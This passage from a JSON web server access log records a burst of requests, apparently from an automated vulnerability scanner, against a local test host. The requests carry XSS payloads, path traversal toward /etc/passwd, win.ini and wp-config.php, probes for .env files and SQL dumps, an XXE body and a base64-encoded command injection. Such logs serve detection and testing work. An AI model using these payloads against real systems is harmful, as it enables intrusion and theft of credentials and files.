"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/web.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/server.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 